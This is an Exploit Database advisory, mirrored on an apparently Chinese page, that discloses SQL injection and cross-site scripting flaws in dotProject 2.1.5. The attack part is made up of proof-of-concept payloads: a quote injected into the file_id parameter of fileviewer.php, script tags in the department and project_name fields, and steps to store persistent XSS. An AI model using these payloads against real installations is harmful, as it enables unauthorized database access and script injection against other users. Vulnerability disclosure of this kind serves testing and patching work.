dotProject 2.1.5 – Multiple Vulnerabilities

• Exploit Database
• 112 阅读

• 作者： lemlajt
  日期： 2011-02-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16207/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # exploit title: sql injection in dotproject 2.1.5 # date 21.o2.2o11 # author: lemlajt # software : dotproject # version: 2.1.5 # tested on: linux # cve : # http://dotproject.net/     PoC : http://localhost/www/cmsadmins/dotpro/dotproject/fileviewer.php?file_id=&apos;   in src: 2 ./dotproject/fileviewer.php: 127 db_loadHash(&apos;SELECT * FROM (<code>dotp_files</code>) WHERE file_id = -9&apos;,NULL)   another xss/sqli is here: POST http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects $department=company_1"><script>alert(1)</script>   we get an error with sql infos and xss.   1. visit http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=addedit (adding new project) 2. POST $project_name="><script> persistant.here</script> and choose &apos;company&apos; to submit the form. 3. to see some affects just visit new project page: (in this example) http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=view&project_id=2   # * regards!   o/